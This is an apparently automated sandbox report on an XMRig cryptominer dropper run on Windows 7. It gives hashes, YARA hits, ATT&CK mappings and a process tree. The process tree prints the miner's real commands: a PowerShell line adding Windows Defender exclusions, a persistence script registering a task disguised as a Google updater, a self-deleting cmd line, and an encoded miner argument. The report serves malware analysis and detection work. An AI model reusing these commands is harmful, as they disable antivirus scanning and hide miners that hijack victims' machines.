xmrig | 165a0de3cbb54178e47215a0ad412c91f1cbbcefc3c3d35d8124c5972d1c1950

max time kernel
424s
max time network
1801s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
23/01/2024, 19:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe
Size

2.0MB
MD5

a16a669a09bf158058b83e04e69fe38e
SHA1

f6c94763850d9e590d86057139e8895a7aacdeea
SHA256

cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512

658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
SSDEEP

49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score

10^/10

xmrig miner upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

description	pid	Process	procid_target
PID 2384 created 1348	2384	UU4Ddwqm5zcuLzGR.exe	21
PID 2384 created 1348	2384	UU4Ddwqm5zcuLzGR.exe	21
PID 2384 created 1348	2384	UU4Ddwqm5zcuLzGR.exe	21
PID 2384 created 1348	2384	UU4Ddwqm5zcuLzGR.exe	21
PID 2808 created 1348	2808	updater.exe	21
PID 2808 created 1348	2808	updater.exe	21
PID 2808 created 1348	2808	updater.exe	21
PID 2808 created 1348	2808	updater.exe	21
PID 1772 created 1348	1772	conhost.exe	21
PID 2808 created 1348	2808	updater.exe	21

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 30 IoCs

miner

resource	yara_rule
behavioral25/memory/536-70-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-74-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-76-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-80-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-82-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-84-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-86-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-88-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-90-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-92-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-94-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-101-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-103-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-105-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-107-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-109-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-111-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-113-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-115-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-117-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-119-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-121-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-123-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-125-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-127-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-129-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-131-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-133-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-135-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral25/memory/536-137-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Deletes itself 1 IoCs

pid	Process
2476	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2808	updater.exe

Loads dropped DLL 1 IoCs

pid	Process
2172	taskeng.exe

UPX packed file 30 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral25/memory/536-70-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-74-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-76-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-80-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-82-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-84-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-86-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-88-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-90-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-92-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-94-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-101-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-103-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-105-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-107-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-109-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-111-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-113-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-115-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-117-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-119-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-121-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-123-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-125-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-127-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-129-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-131-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-133-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-135-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral25/memory/536-137-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2808 set thread context of 1772	2808	updater.exe	52
PID 2808 set thread context of 536	2808	updater.exe	46

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	UU4Ddwqm5zcuLzGR.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2612	schtasks.exe
1432	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2316	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = a042b65af350da01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
2384	UU4Ddwqm5zcuLzGR.exe
2384	UU4Ddwqm5zcuLzGR.exe
3048	powershell.exe
2384	UU4Ddwqm5zcuLzGR.exe
2384	UU4Ddwqm5zcuLzGR.exe
2668	powershell.exe
2384	UU4Ddwqm5zcuLzGR.exe
2384	UU4Ddwqm5zcuLzGR.exe
2384	UU4Ddwqm5zcuLzGR.exe
2384	UU4Ddwqm5zcuLzGR.exe
2796	powershell.exe
2808	updater.exe
2808	updater.exe
1512	powershell.exe
2808	updater.exe
2808	updater.exe
2636	powershell.exe
2808	updater.exe
2808	updater.exe
2808	updater.exe
2808	updater.exe
1772	conhost.exe
1772	conhost.exe
2808	updater.exe
2808	updater.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	2808	updater.exe
Token: SeAssignPrimaryTokenPrivilege	2316	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2316	WMIC.exe
Token: SeSecurityPrivilege	2316	WMIC.exe
Token: SeTakeOwnershipPrivilege	2316	WMIC.exe
Token: SeLoadDriverPrivilege	2316	WMIC.exe
Token: SeSystemtimePrivilege	2316	WMIC.exe
Token: SeBackupPrivilege	2316	WMIC.exe
Token: SeRestorePrivilege	2316	WMIC.exe
Token: SeShutdownPrivilege	2316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2316	WMIC.exe
Token: SeUndockPrivilege	2316	WMIC.exe
Token: SeManageVolumePrivilege	2316	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2316	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2316	WMIC.exe
Token: SeSecurityPrivilege	2316	WMIC.exe
Token: SeTakeOwnershipPrivilege	2316	WMIC.exe
Token: SeLoadDriverPrivilege	2316	WMIC.exe
Token: SeSystemtimePrivilege	2316	WMIC.exe
Token: SeBackupPrivilege	2316	WMIC.exe
Token: SeRestorePrivilege	2316	WMIC.exe
Token: SeShutdownPrivilege	2316	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2316	WMIC.exe
Token: SeUndockPrivilege	2316	WMIC.exe
Token: SeManageVolumePrivilege	2316	WMIC.exe
Token: SeLockMemoryPrivilege	536	conhost.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2668 wrote to memory of 2612	2668	powershell.exe	32
PID 2668 wrote to memory of 2612	2668	powershell.exe	32
PID 2668 wrote to memory of 2612	2668	powershell.exe	32
PID 2476 wrote to memory of 2680	2476	cmd.exe	34
PID 2476 wrote to memory of 2680	2476	cmd.exe	34
PID 2476 wrote to memory of 2680	2476	cmd.exe	34
PID 2796 wrote to memory of 2524	2796	powershell.exe	38
PID 2796 wrote to memory of 2524	2796	powershell.exe	38
PID 2796 wrote to memory of 2524	2796	powershell.exe	38
PID 2796 wrote to memory of 2508	2796	powershell.exe	39
PID 2796 wrote to memory of 2508	2796	powershell.exe	39
PID 2796 wrote to memory of 2508	2796	powershell.exe	39
PID 2172 wrote to memory of 2808	2172	taskeng.exe	40
PID 2172 wrote to memory of 2808	2172	taskeng.exe	40
PID 2172 wrote to memory of 2808	2172	taskeng.exe	40
PID 2636 wrote to memory of 1432	2636	powershell.exe	44
PID 2636 wrote to memory of 1432	2636	powershell.exe	44
PID 2636 wrote to memory of 1432	2636	powershell.exe	44
PID 2808 wrote to memory of 1772	2808	updater.exe	52
PID 2984 wrote to memory of 2316	2984	cmd.exe	47
PID 2984 wrote to memory of 2316	2984	cmd.exe	47
PID 2984 wrote to memory of 2316	2984	cmd.exe	47
PID 2808 wrote to memory of 536	2808	updater.exe	46

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1348
- C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe
  "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3048
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2668
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:2612
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2796
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
    dw20.exe -x -s 720
    3⤵
    PID:2524
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:2508
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:536
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:2948
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  PID:2984
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe qtdiqnkejoz
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1512

C:\Windows\System32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:2680

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\system32\taskeng.exe
taskeng.exe {DE72AB0F-C30B-46F2-A087-E942CD6B3F79} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2172

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
1⤵
- Creates scheduled task(s)
PID:1432

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
1⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2316

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe

Filesize
31KB

MD5
c955f19adea3ed22841d52d6751f473a

SHA1
3846ef263bf4dcf01c4191d9506f09bbc5a054cd

SHA256
3434b42ba3dd5efc221c47eea3c49a0f77734d2eacadfd1c1824c119794b134b

SHA512
71f7fff15c0e2e0d60bd4052b3a90f287ce3ba7c7671e4b77efcea1fc4a344bb84b870b5bb66cdb4325980919ef71d286ee9571be677f59756dc97b64507ccd5

Download Submit
C:\Program Files\Google\Chrome\updater.exe

Filesize
116KB

MD5
65b518addace5bf5470307853b989861

SHA1
e71126bb0662b8fa05342d3f0d3d023896dde6dd

SHA256
ef2af6e50e5bbec6f3e2c40057bf477d94746073e04a5c8bf4e90d3bdc892672

SHA512
22e86bafac80ce0b9f596453bde0714d2211aead1a1df876c0f55ad6369ba213986e7d7c6d44dcdd47d4588ff7f57273bf8e0745eaf92e4daad947ae0cacb3b4

Download Submit
C:\Program Files\Google\Libs\g.log

Filesize
198B

MD5
37dd19b2be4fa7635ad6a2f3238c4af1

SHA1
e5b2c034636b434faee84e82e3bce3a3d3561943

SHA256
8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07

SHA512
86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HP3PSAWOBKEDRANJNE9T.temp

Filesize
7KB

MD5
d83ea173017a5019b9327c4cad3f269d

SHA1
585b54fbc71d4daf750cf091c082dcbc7987e092

SHA256
6dd461b1756040f2d6df7ac44c88bbd21b982cfa5eb9f8ce6491882e870a8039

SHA512
5d332eff353a41e5fedf141f44731e657a2263b9b0893933da1c0de0889f408a05f802505968140d5959c676986bbfe1a1b5408cbf524643d87c6faf513cc1aa

Download Submit
\Program Files\Google\Chrome\updater.exe

Filesize
21KB

MD5
d54a979328b5df200fb166c49994b375

SHA1
93342cd198178b2942ec163234921fe101da4e62

SHA256
df201afb076a1928c44499e007ed78d46b7498a028eb89970f557c2304f33391

SHA512
ede3aa7f72b72d76e4c28a0310bceaba1965596c88049935a52dc981e4b33fc2ac95a21805aced0225f9e35ea1d1451c72c078fe47295dd5da0bf9d95ff58c78

Download Submit
memory/536-115-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-111-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-125-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-123-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-121-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-129-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-119-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-117-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-72-0x0000000000F90000-0x0000000000FB0000-memory.dmp

Filesize
128KB

Download
memory/536-131-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-84-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-109-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-107-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-105-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-103-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-71-0x0000000000800000-0x0000000000820000-memory.dmp

Filesize
128KB

Download
memory/536-101-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-94-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-92-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-90-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-88-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-86-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-127-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-74-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-113-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-133-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-82-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-76-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-78-0x0000000000F90000-0x0000000000FB0000-memory.dmp

Filesize
128KB

Download
memory/536-77-0x0000000000800000-0x0000000000820000-memory.dmp

Filesize
128KB

Download
memory/536-69-0x00000000006E0000-0x0000000000700000-memory.dmp

Filesize
128KB

Download
memory/536-80-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-70-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-135-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/536-137-0x0000000140000000-0x00000001407F4000-memory.dmp

Filesize
8.0MB

Download
memory/1512-50-0x000007FEF4FA0000-0x000007FEF593D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-54-0x000007FEF4FA0000-0x000007FEF593D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-48-0x000007FEF4FA0000-0x000007FEF593D000-memory.dmp

Filesize
9.6MB

Download
memory/1512-47-0x000000001A000000-0x000000001A2E2000-memory.dmp

Filesize
2.9MB

Download
memory/1512-49-0x0000000001460000-0x00000000014E0000-memory.dmp

Filesize
512KB

Download
memory/1512-52-0x0000000001460000-0x00000000014E0000-memory.dmp

Filesize
512KB

Download
memory/1512-53-0x0000000001460000-0x00000000014E0000-memory.dmp

Filesize
512KB

Download
memory/1512-51-0x0000000001460000-0x00000000014E0000-memory.dmp

Filesize
512KB

Download
memory/1772-73-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/1772-79-0x0000000140000000-0x0000000140016000-memory.dmp

Filesize
88KB

Download
memory/2384-0-0x000000013FC90000-0x000000013FEA1000-memory.dmp

Filesize
2.1MB

Download
memory/2384-29-0x000000013FC90000-0x000000013FEA1000-memory.dmp

Filesize
2.1MB

Download
memory/2524-41-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/2636-60-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/2636-55-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2636-57-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2636-58-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/2636-59-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/2636-56-0x0000000001620000-0x00000000016A0000-memory.dmp

Filesize
512KB

Download
memory/2636-61-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp

Filesize
9.6MB

Download
memory/2668-23-0x000007FEF4FA0000-0x000007FEF593D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-21-0x000007FEF4FA0000-0x000007FEF593D000-memory.dmp

Filesize
9.6MB

Download
memory/2668-19-0x000000001B4A0000-0x000000001B782000-memory.dmp

